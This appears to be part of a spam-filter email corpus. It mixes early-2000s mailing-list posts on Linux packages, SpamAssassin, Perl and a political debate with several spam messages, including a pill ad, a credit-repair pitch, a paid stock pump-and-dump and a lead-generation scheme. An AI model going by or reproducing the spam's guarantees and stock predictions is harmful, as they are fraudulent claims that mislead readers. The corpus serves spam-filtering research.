 /etc/apt/sources.list, I just issue 'apt-update' then 'apt-install
 gnome-session' ?  Also Gaim doesn't work with GNOME 2.0 just yet?
 On Sun, 2002-07-21 at 14:12, che wrote:
 &gt; On Sun, 21 Jul 2002 14:50:13 -0400
 &gt; che &lt;che666@uni.de&gt; wrote:
 &gt; 
 &gt; &gt; On 21 Jul 2002 23:59:59 +1200
 &gt; &gt; Mark Derricutt &lt;mark@talios.com&gt; wrote:
 &gt; &gt; 
 &gt; &gt; &gt; On Mon, 2002-07-22 at 06:20, che wrote:
 &gt; &gt; &gt; 
 &gt; &gt; &gt; &gt; The server mentioned above works again now :)!
 &gt; &gt; &gt; 
 &gt; &gt; &gt; Any problems with the rpm's they provided?
 &gt; &gt; &gt; 
 &gt; &gt; &gt; 
 &gt; &gt; &gt; _______________________________________________
 &gt; &gt; &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; &gt; &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; &gt; 
 &gt; &gt; #redhat 7.3
 &gt; &gt; rpm http://apt.sunnmore.net gnome2 73
 &gt; &gt; rpm-src http://apt.sunnmore.net gnome2 73
 &gt; &gt; 
 &gt; &gt; #redhat 7.2
 &gt; &gt; rpm http://apt.sunnmore.net gnome2 72
 &gt; &gt; rpm-src http://apt.sunnmore.net gnome2 72
 &gt; &gt; 
 &gt; &gt; thats the correct lines to be added to sources.list for the repository
 &gt; &gt; 
 &gt; &gt; i just did a apt-get install gnome-session its still progressing :)
 &gt; &gt; 
 &gt; 
 &gt; after apt-get install gnome-session
 &gt; i did another apt-get upgrade (25 more packages) and it works now... i am in gnome 2.0 wohooooo :) looks very great very "tidy" only error message i got was about a mixer applet on login (no biggie to me) even the old sawfish still works. yet its great and works cant say anythign negative yet :)
 &gt; 
 &gt; just btw. if someone knows any other nice repositorys please post em :).
 &gt; 
 &gt; thanks in advance,
 &gt; che
 &gt; &gt; _______________________________________________
 &gt; &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 -- 
 :
 ####[ Linux One Stanza Tip (LOST) ]###########################
 Sub : DOS to Unix conversion (#3)                    LOST #137
 DOS text files with ^M can be cleared by pico editor. Load the
 dos text file in pico, Do a small edit job on it.  (e.g. place
 a space and delete it again) .. Save .. Quit. All ^Ms gone !!
 ####&lt;bish@nde.vsnl.net.in&gt;####################################
 :
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 96% Of Our Customers Increased Size By 1-3"             ZUMTIDU
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;b&gt;&lt;FONT SIZE=3D4&gt;In a recent survey conducted by =
 &lt;FONT COLOR=3D#0033FF&gt;&lt;B&gt;Durex&lt;/B&gt;
 &lt;
 /
 F
 O
 N
 T
 &gt;
 c
 o
 n
 d
 o
 m
 s
 ,
 &lt;
 F
 O
 N
 T
 C
 O
 L
 O
 R
 =
 3
 D
 #
 F
 F
 0
 0
 3
 3
 &gt;
 6
 =
 7%
 &lt;
 /
 F
 O
 N
 T
 &gt;
 o
 f
 w
 o
 m
 e
 n
 s
 a
 i
 d
 t
 h
 a
 t
 &lt;
 b
 r
 &gt;
 t
 h
 e
 y
 a
 r
 e
 u
 n
 h
 a
 p
 p
 y
 w
 i
 t
 h
 t
 h
 e
 s
 i
 z
 e
 o
 f
 t
 h
 e
 i
 r
 l
 o
 =
 vers. Proof that &lt;FONT COLOR=3D#FF0033&gt;size does&lt;br&gt;matter&lt;/FONT&gt;! A large=
  member has much more surface area and is capable of&lt;br&gt;stimulating more n=
 erve endings, providing more pleasure for you and your&lt;br&gt;partner. Our rev=
 olutionary pill developed by world famous pharmacist is&lt;br&gt;guaranteed to i=
 ncrease your size by 1-3".&lt;BR&gt;&lt;A HREF=3D"http://www.mailcomesandgoes.com/v=
 irility/affiliate/affiliatewiz.asp?BannerID=3D1&amp;AffiliateID=3D4&amp;Task=3DCli=
 ck"&gt;Enter here for details&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;b&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT SIZE=3D1 COLOR=3D#FFFF=
 CC&gt;To come off just &lt;A "http://www.mailcomesandgoes.com/virility/affiliate=
 /affiliatewiz.asp?BannerID=3D1&amp;AffiliateID=3D4&amp;Task=3DClick"&gt;Open here&lt;/A&gt;=
 &lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Super credit repair program.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;P ALIGN=3DCENTER&gt;&lt;FONT  COLOR=3D"#ff0000" SIZE=3D3 PTSIZE=3D12 FAMIL=
 Y=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;B&gt;Is Your Credit A Mess?&lt;/b&gt;&lt;/F=
 ONT&gt;&lt;B&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;BR&gt;
 Do you want Perfect Credit again?&lt;BR&gt;
 Wouldn't it be nice to easily get loans for cars, boats, and houses?&lt;/font=
 &gt;&lt;/B&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: =
 #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"=
 0"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;P ALIGN=3DLEFT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"=
 BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D=
 "Arial" LANG=3D"0"&gt;&lt;BR&gt;
   &lt;B&gt;We have the Solution!!&lt;/B&gt; &lt;B&gt;ONLINE CREDIT REPAIR!!!&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
   Now you can clean up and repair your bad credit online from the convenie=
 nce 
   of your home computer. Our program is &lt;B&gt;100% effective&lt;/B&gt; for helping =
 you 
   fix your credit, and &lt;B&gt;you can watch your credit with real-time updates=
 &lt;/B&gt;.&lt;B&gt; 
   &lt;/B&gt;Its been called the #1 program for fixing bad credit!&lt;BR&gt;
 &lt;BR&gt;
   &lt;/font&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COL=
 OR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=
 =3D"0"&gt;&lt;B&gt;&lt;A HREF=3D"http://www.webcredit2002.com/?CID=3D1010&amp;amp;MID=3D11=
 002"&gt;Click 
   Here for FREE information Now!&lt;/A&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
   &lt;/b&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGRO=
 UND-COLOR: #ffffff" SIZE=3D1 PTSIZE=3D8 FAMILY=3D"SANSSERIF" FACE=3D"Verda=
 na" LANG=3D"0"&gt;&lt;/font&gt;&lt;/B&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D=
 "BACKGROUND-COLOR: #ffffff" SIZE=3D1 PTSIZE=3D8 FAMILY=3D"SANSSERIF" FACE=3D=
 "Verdana" LANG=3D"0"&gt;Your 
   email address was obtained from a purchased list, Reference # 1010-11002=
 .&amp;nbsp; 
   If you wish to unsubscribe from this list, please &lt;A HREF=3D"http://213.=
 139.76.100/PHP/remove.php"&gt;Click 
   here&lt;/A&gt; and enter your name into the remove box. &lt;/FONT&gt;&lt;FONT  COLOR=3D=
 "#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PT=
 SIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Verdana" LANG=3D"0"&gt;	
   &lt;BR&gt;
 	&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/font&gt;&lt;/P&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-C=
 OLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Verdana" =
 LANG=3D"0"&gt;&lt;p&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Conor Wynne wrote:
 &gt;Dunno Tim, but I'm seriously considering buying one just for osx. But I'm
 &gt;gonna wait till they are providing the latest release first.
 Every new Mac comes with an upgrade 10.2 CD as of last week.
 So if you bought one on the 12th, you'd be running 10.2 before the release
 this Friday night.
 &gt;Unless someone is selling some pomme kit for cheapish/swap?
 Good luck with that, even Mac geeks have a longer upgrade cycle than the
 average PC user, but you'd never know...
 M.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Two rule suggestions
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 19 Jul 2002, Justin Mason mused:
 &gt; Shane Williams said:
 &gt;&gt; Also, if a single line of yelling scores -0.036, why not just round
 &gt;&gt; it off to 0 and not have the test run at all?
 &gt; 
 &gt; good question ;)
 It seems reasonable to have a configurable minimum below which
 spamassassin flattens the test to zero (turning it off): by default set
 to zero; but if you set it to say 0.01, spamassassin would ignore tests
 with scores -0.01&lt;0&lt;0.01 (trading accuracy for time).
 The overkill variant of this feature would have scores scored by (score
 * relative-time-taken) with relative-time-taken computed over a large
 corpus (probably Craig's ;} ). Then you could specify a minimum value of
 *that* parameter to flatten at, giving assurances that you're killing
 only tests that are expensive for their utility.
 Unfortunately I can't think of a good name for that parameter.
 I can whip up a patch if anyone thinks this is any use.
 -- 
 `There's something satisfying about killing JWZ over and over again.'
                                         -- 1i, personal communication
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-17
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * New Perl Mongers Web Site
     * Java vs. Perl
     * This Week on perl5-porters (9-15 September 2002)
 +--------------------------------------------------------------------+
 | New Perl Mongers Web Site                                          |
 |   posted by KM on Monday September 16, @08:41 (groups)             |
 |   http://use.perl.org/article.pl?sid=02/09/16/1243234              |
 +--------------------------------------------------------------------+
 [0]davorg writes "Leon Brocard has been working hard to update the
 [1]Perl Mongers web site. We're still going thru the process of cleaning
 up the data about the Perl Monger groups, so if you see something that
 isn't quite right then please [2]let us know."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/16/1243234
 Links:
     0. mailto:dave@dave.org.uk
     1. http://www.pm.org/
     2. mailto:user_groups@pm.org
 +--------------------------------------------------------------------+
 | Java vs. Perl                                                      |
 |   posted by pudge on Monday September 16, @11:15 (java)            |
 |   http://use.perl.org/article.pl?sid=02/09/16/1448246              |
 +--------------------------------------------------------------------+
 It seems the older Perl gets, the more willing people are to believe that
 it sucks, without any reasonable facts. [0]davorg writes "You may have
 seen the article [1]Can Java technology beat Perl on its home turf with
 pattern matching in large files? that there has been some debate about on
 both #perl and comp.lang.perl.misc today. One of the biggest criticisms
 of the article was that the author hasn't published the Perl code that he
 is comparing his Java with."
 This story continues at:
     http://use.perl.org/article.pl?sid=02/09/16/1448246
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/16/1448246
 Links:
     0. mailto:dave@dave.org.uk
     1. http://developer.java.sun.com/developer/qow/archive/184/index.jsp
 +--------------------------------------------------------------------+
 | This Week on perl5-porters (9-15 September 2002)                   |
 |   posted by rafael on Monday September 16, @16:17 (summaries)      |
 |   http://use.perl.org/article.pl?sid=02/09/16/2026255              |
 +--------------------------------------------------------------------+
 This was not a very busy week, with people packing for YAPC::Europe, and
 all that... Nevertheless, the smoke tests were running, the bug reports
 were flying, and an appropriate amount of patches were sent. Read about
 printf formats, serialized tied thingies, built-in leak testing, syntax
 oddities, et alii.
 This story continues at:
     http://use.perl.org/article.pl?sid=02/09/16/2026255
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/16/2026255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</si>
  <si>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This is the final test of a
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;=21DOCTYPE HTML PUBLIC =22-//W3C//DTD HTML 4.0 Transitional//EN=22&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D=22text/html; charset=3Dwindows-1=
 252=22&gt;
 &lt;STYLE&gt;A:link =7B
     TEXT-DECORATION: none
 =7D
 A:active =7B
     TEXT-DECORATION: none
 =7D
 A:visited =7B
     TEXT-DECORATION: none
 =7D
 A:hover =7B
     COLOR: =230033ff; TEXT-DECORATION: underline
 =7D
 &lt;/STYLE&gt;
 &lt;META content=3D=22MSHTML 6.00.2713.1100=22 name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY text=3D=23000000 vLink=3D=230033ff link=3D=230033ff bgColor=3D=23ffffff&gt;
 &lt;TABLE borderColor=3D=233366cc cellSpacing=3D4 cellPadding=3D15 border=3D4&gt;
   &lt;TR&gt;
     &lt;TD bgColor=3D=233366cc&gt;
       &lt;DIV align=3Dcenter&gt;&lt;FONT face=3D=22arial, helvetica=22 color=3D=23ffff=
 ff&gt;&lt;FONT size=3D6&gt;&lt;B&gt;For 
       Immediate Release&lt;/B&gt;&lt;BR&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;P&gt;&lt;FONT face=3D=22arial, helvetica=22 color=3D=23000000 size=3D3&gt;&lt;FONT=
       size=3D2&gt;&lt;STRONG&gt;Cal-Bay (Stock Symbol:&amp;nbsp;CBYI) 
       &lt;/STRONG&gt;Watch for analyst =22Strong Buy Recommendations=22 and sev=
 eral advisory 
       newsletters picking CBYI.&amp;nbsp;&amp;nbsp; CBYI has filed to be traded=
  on 
       the&amp;nbsp;OTCBB, share prices historically INCREASE when companies=
  get 
       listed on this larger trading&amp;nbsp;exhange. CBYI is trading aroun=
 d =24.30=A2 
       and should skyrocket to =242.66 - =243.25 a share in the near futur=
 e. &amp;nbsp; 
       &lt;STRONG&gt;Put CBYI on your watch list, acquire a postion&lt;/STRONG&gt; 
       &lt;/FONT&gt;&lt;FONT size=3D2&gt;&lt;STRONG&gt;TODAY.&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;F=
 ONT 
       face=3D=22arial, helvetica=22 color=3D=23000000 size=3D3&gt;&lt;FONT size=3D2&gt;=
       &lt;P&gt;&lt;B&gt;REASONS TO INVEST IN CBYI&lt;/B&gt; 
       &lt;LI&gt;A profitable company, NO DEBT and is on track to beat ALL ear=
 nings 
       estimates with&lt;FONT size=3D2&gt; increased revenue of 50% annually=21 =
 &lt;/FONT&gt;
       &lt;LI&gt;One of the FASTEST growing distributors in environmental &amp;amp=
 ; safety 
       equipment instruments. 
       &lt;LI&gt;&lt;/FONT&gt;&lt;FONT size=3D2&gt;Excellent management team, several EXCLU=
 SIVE 
       contracts.&amp;nbsp; IMPRESSIVE client list including the&amp;nbsp;U.S. A=
 ir Force, 
       Anheuser-Busch, Chevron Refining and Mitsubishi Heavy Industries,=
       GE-Energy &amp;amp; Environmental Research. &lt;/FONT&gt;&lt;/FONT&gt;
       &lt;P&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;RAPIDLY GROWING INDUSTRY&lt;/ST=
 RONG&gt;&amp;nbsp; 
       &lt;BR&gt;Industry revenues exceed =24900 million, estimates indicate th=
 at there 
       could be as much as =2425 billion from =22smell technology=22 by the=
  end of 
       2003.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;=21=21=21=21 CONGRATULATIONS 
       =21=21=21=21=21&lt;BR&gt;&lt;/STRONG&gt;To&amp;nbsp;our subscribers that took advantag=
 e of 
       our&amp;nbsp;last recommendation to buy&amp;nbsp;NXLC.&amp;nbsp; It rallied f=
 rom =247.87 
       to&amp;nbsp;=2411.73=21&lt;/FONT&gt;&amp;nbsp;&amp;nbsp;&lt;/P&gt;&lt;A 
       href=3D=22http://quote.morningstar.com/Quote.html?TimeFrame=3DY*&amp;amp=
 ;ExchangeId=3D&amp;amp;ticker=3DCBYI=22&gt;&lt;FONT 
       color=3D=230000ff size=3D2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;
       &lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT color=3D=23ff0000&gt;ALL removes HONERE=
 D. Please allow 7 
       days to be removed and send ALL address to: &lt;A href=3D=22mailto:hon=
 ey9531=40btamail.net.cn=22&gt;honey9531=40mail.net.cn&lt;/A&gt;&lt;/A&gt;&lt;/FONT&gt; 
       &lt;/STRONG&gt;&lt;/A&gt;&lt;/A&gt;&lt;/A&gt;&lt;/P&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;&lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;&lt;FONT size=3D1&gt;Certain statements contained in this news release may =
 be 
 forward-looking statements within the meaning of The Private Securities=
 Litigation Reform Act of 1995. These statements may be identified by su=
 ch terms 
 as =22expect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or simila=
 r terms. We are NOT 
 a registered investment advisor or a broker dealer. This is NOT an offe=
 r to buy 
 or sell securities. No recommendation that the securities of the compan=
 ies 
 profiled should be purchased, sold or held by individuals or entities t=
 hat learn 
 of the profiled companies. We were paid =2427,000 in cash by a third par=
 ty to 
 publish this report. Investing in companies profiled is high-risk and u=
 se of 
 this information is for reading purposes only. If anyone decides to act=
  as an 
 investor, then it will be that investor's sole risk. Investors are advi=
 sed NOT 
 to invest without the proper advisement from an attorney or a registere=
 d 
 financial broker. Do not rely solely on the information presented, do a=
 dditional 
 independent research to form your own opinion and decision regarding in=
 vesting 
 in the profiled companies. Be advised that the purchase of such high-ri=
 sk 
 securities may result in the loss of your entire investment. &lt;/FONT&gt;&lt;FO=
 NT 
 size=3D1&gt;The owners of this publication may already own free trading sha=
 res in 
 CBYI and may immediately sell all or a portion of these shares into the=
  open 
 market at or about the time this report is published.&amp;nbsp; Factual sta=
 tements 
 are made as of the date stated and are subject to change without notice=
 .&amp;nbsp; 
 Not intended for recipients or residents of CA,CO,CT,DE,ID, &lt;FONT 
 size=3D1&gt;IL,IA,LA,MO,NV,NC,OK,OH,PA,RI,TN,VA,WA,WV,WI. Void where 
 prohibited.&amp;nbsp; &lt;/FONT&gt;&lt;FONT size=3D1&gt;Copyright c 2001&lt;/FONT&gt; 
 &lt;/FONT&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 **********
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hey :)                         9576
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[4]: Al'Qaeda's fantasy ideology:  Policy Review no. 114
</t>
  </si>
  <si>
    <t xml:space="preserve">
 GLM&gt; Hate-lit rests on a premise that "them" are fundamentally different
 GLM&gt; critters from "us" and thus, by being "them-like" they, as a
 GLM&gt; classification, "bring it on themselves" for us to "correct" them by
 GLM&gt; any means gruesome we might choose, after all, it's not /us/ pulling
 GLM&gt; the trigger, it's "them", right?  I've heard Bush say this (verbatim)
 GLM&gt; more than once, and with a straight face.
 Personally, I don't know where you got that from.  Here's how I
 grokked the whole piece.   A theory (in this case, that fantasy was
 the propagating force/drive?) behind a given act, that from those not
 in the fantasy seems morally outrageous, repugnant or unjustified.
 He listed many examples, oldies and goodies.   I don't think the
 author meant to come off at the point that you seem to be
 conjecturing -- that this is purely an 'other' offense.   I certainly
 didn't read it that way, but it _did_ bother me that he did not
 include some of the examples I listed, or as Damien? mentioned on an
 earlier post, the whole collective fantasy of capitalism.
 GLM&gt; Call it gay-bashing or whatever, it's convenient tunnel-vision and
 GLM&gt; lies to justify violence against a creature genetically, morally and
 GLM&gt; intellectually indistinguishable from your sister.  Go ahead, peel the
 GLM&gt; skin off a random daughter of each of them and lay them side by side
 GLM&gt; on the pavement, and you tell me which one was racially guilty, which
 GLM&gt; one carried the "infection" the "plague" (note, not the "antigen" or
 GLM&gt; the "hormone", which have similar metaphoric effects to philosophy,
 GLM&gt; but they chose the fear-charged words)
 This article never got into the bones &amp; blood of what humans are Gary.
   You're assuming too much, dearie.  His was all a psychological game.
 I'd be willing to wager that, his point was merely psychological.
 That there is a distinguishing characteristic (the fantasy) about
 those who are perpetually deluded into a preconceived notion of how
 the world needs to work -- his examples were very clear -- a
 psychopathological individual and on a lesser extreme, the father who
 fantasizes his son as a football player.   I kinda read 'levels' into
 that distinguishing characteristic though.   Meaning, just because
 you believe in the/a fantasy, does not mean necessarily that you're
 going to be an evil terrorist.   It just means you're playing alittle
 game in your head, and because of that you are a bit different from
 the rest of the wavelengths floating around in the cosmos at that
 moment.
 GLM&gt; "Make no mistake about it" it oozes rhetorical vehicles to obfuscate
 GLM&gt; it's lack of bits paragraph after paragraph in pushing an agenda to
 GLM&gt; /excuse/ "our" violence and suspension of human rights to 'clense'
 GLM&gt; ourselves of "them", the 'non-human' (or lesser-human) objects of its
 GLM&gt; hate.
 I didn't read cleanse or nonhuman anywhere.   Mind telling me where
 you saw those words?   Sure, I'll bite that the article had rhetoric.
 I'll also bite that he wasn't fair entirely with his theory.   If he
 meant it to be a universal (capable of including even the common
 father with a football complex dream) he should have included our
 delusions in all of this.   But honestly, where in the hell did you
 get 'cleanse ourselves of 'them', the 'non-human' (or lesser-human)
 objects... ?
 GLM&gt; What else shall we call it?  Just anti-liberal?  
 Lots of things can be anti-liberal and not be bad.  :)
 GLM&gt; Better question: What if, as in physics, the laws of human behaviour
 GLM&gt; are the same everywhere in the Universe?  What if Al Queda is in fact
 GLM&gt; more like our mafia or biker gangs or school board trustees? 
 Well, as sinister as the schoolboard is, they didn't go kill 4k+
 people.   Lets put some of this moral relativism de jour into
 perspective here.   Al'Qaeda had a fantasy.  This fantasy involved a
 whole mess of 'others' not in their collective fantasy.   This _is_
 much like the mafia's collective fantasy about brotherhood and
 organized crime, or the biker gang's fantasy about being badasses on
 the road or the school board's fantasy about indoctrinating your
 children with Jesus, but its not equivalent.
 The terrorists went out, and purposely destroyed things, and killed
 people.   This is bad, I don't care what universe you're in.   While
 the aspect of 'fantasy' can be applied to all groups, and that label
 can be equivalent, the perpetration of the fantasy has different
 effects and must be judged differently.   Otherwise, whats a genocide?
 Just a father-son complex gone terribly awry?
 GLM&gt; What if they operate by the same neural-annealing Maxima-Minima
 GLM&gt; gratification mechanisms as you or I and every other creature on this
 GLM&gt; planet?  
 They just may, that doesn't dispute that their fantasy was a deadly
 one.
 GLM&gt; What if, instead of magically and uniquely alien, they are, just like
 GLM&gt; our own captains and leaders, really only in it for the money, for
 GLM&gt; trade rights-of-way and for power over minions who will foolishly make
 GLM&gt; it all happen, minions whom they can once again dup with /virtually/
 GLM&gt; /identical/ rhetoric ... except we call theirs "fundamentalist islam",
 GLM&gt; and they call ours "imperialist satanism"?
 GLM&gt; When both sides can call the other "evil" to the cheers of their local
 GLM&gt; public and media, you can bet something's rotten in the state of Denmark.
 So your whole point is we too live in a fantasy.  Sure.   No
 questions.  Its the thing that bothered me about the article.   I
 think the difference between our fantasy and theirs, is that there are
 folks out there, in our fantasy allowed to voice their opinons about
 the 'fantasy' and keep folks a bit grounded in the real versus the
 made-up.   From what I gather, there are no such guards, or
 protections on their end.   Thats the problem with some regeimes over
 others.   THey all have bad points -- Ours is in a collective fantasy
 that we need to control the oil, masking the intentions behind a very
 clever, albiet convienent other fantasy of 'terrorism'.   Point is,
 Gary, the 'terrorism' fantasy really happened.  People really died.
 I won't argue we're innocent in the perpetration of our fantasy, but
 I'll argue that we're not just blindly 'cleansing' 'non-humans'.
 GLM&gt; I guess that's why I live in the woods.  Bears and racoons I
 GLM&gt; understand, but I really just don't 'get' people.
 Too bad bears and racoons don't protect you from the silly fantasies
 of people, yours or others.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Neil trained a classifier using 3 sets with about 500 ham and spam in each.
 We're missing half his test run results due to a cmp.py bug (since fixed);
 the "before custom fiddling" figures on the 3 reported runs were:
     false positive percentages
         0.187
         0.749
         0.780
     total unique fp 19
     false negative percentages
         2.072
         2.448
         0.574
     total unique fn 43
 The "total unique" figures counts all 6 runs; it's just the individual-run
 fp and fn percentages we're missing for 3 runs.
 Jeremy reported these "before custom fiddling" figures on 4 sets with about
 600 ham and spam in each:
     false positive percentages
         0.000
         1.398
         1.398
         0.000
         1.242
         1.242
         1.398
         1.398
         0.000
         1.553
         1.553
         0.000
     total unique fp 139
     false negative percentages
        10.413
         6.104
         5.027
         8.259
         2.873
         5.745
         5.206
         4.488
         9.336
         5.206
         5.027
         9.874
     total unique fn 970
 So things are clearly working much better for Neil.  Both reported
 significant improvements in both f-n and f-p rates by folding in more header
 lines.  Neal added Received analysis to the base tokenizer's header
 analysis, and Jeremy skipped the base tokenizer's header analysis completely
 but added base-subject-line-like but case-folded tokenization for almost all
 header lines (excepting only Received, Data, X-From_, and, I *suspect*, all
 those starting with 'x-vm').
 When I try 5 random pairs of 500-ham + 500-spam subsets in my test data, I
 see:
     false positive percentages
         0.000
         0.000
         0.200
         0.000
         0.200
         0.000
         0.200
         0.000
         0.000
         0.200
         0.400
         0.000
         0.200
         0.000
         0.200
         0.400
         0.000
         0.400
         0.200
         0.600
     total unique fp 10
     false negative percentages
         0.800
         0.400
         0.200
         0.600
         1.000
         0.000
         0.600
         1.200
         1.200
         0.800
         0.400
         0.800
         1.800
         0.800
         0.400
         1.000
         1.000
         0.400
         0.000
         0.600
     total unique fn 36
 This is much closer to what Neil saw, but still looks better.  Another run
 on a disjoint 5 random pairs looked much the same; total unique fp rose to
 12 and fn fell to 27; on a third run with another set of disjoint 5 random
 pairs, likewise, with fp 12 and fn 40.  So I'm pretty confident that it's
 not going to matter which random subsets of 500 I take from my data.
 It's hard to conclude anything given Jeremy's much worse results.  If they
 were in line with Neil's results, I'd suspect that I've over-tuned the
 algorithm to statistical quirks in my corpora.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ɽ췢,Ͼؼ۱ѡ
</t>
  </si>
  <si>
    <t xml:space="preserve">u8bJvcLD087M7Mzst6IgIGh0dHA6Ly93d3cubmpjaGluYS5jb20vc2t0dGYuaHRtDQoNCsTP
 vqnM2Lzbsfa53cjOxOPRoSAgaHR0cDovL3d3dy5uamNoaW5hLmNvbS9iZ21jLmh0bQ0KDQq6
 2L+ooaLT79L0wcTM7KGivbvT0aGi1fe76SAgaHR0cDovL3d3dy5uamNoaW5hLmNvbS9xd2x0
 Z2MuaHRtDQoNCsikzrbQws7Fo6zNvM7EsqLDsqOsvqHU2iBodHRwOi8vd3d3Lm5qY2hpbmEu
 Y29tDQo=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</si>
  <si>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Reach Prospects Competitors Miss
</t>
  </si>
  <si>
    <t xml:space="preserve">_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
  S   P   E   C   I   A   L         R   E   P   O   R   T  
 How To Reliably Generate Hundreds Of Leads And Prospects
 Every Week!
 _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
 Our research has found that many online entrepreneurs have
 tried one or more of the following...
     Free Classifieds? (Don't work anymore)
     Web Site? (Takes thousands of surfers)
     Banners? (Expensive and losing their punch)
     E-Zine? (Hope they have a -huge- subscriber list)
     Search Engines? (Forget it, unless you're in the top 10)
          S O   W H A T   D O E S   W O R K ?
 Although often misunderstood, there is one method that has
 proven to succeed time-after-time.
          E - M A I L   M A R K E T I N G ! !
 Does the thought of $50,000 to $151,200.00 per year make you
 tingle with excitement?  Many of our customers make that and 
 more... Click here to find out how:
 &lt;a href="http://32.97.166.75/usinet.zvlavii"&gt;
 http://32.97.166.75/usinet.zvlavii &lt;/a&gt;
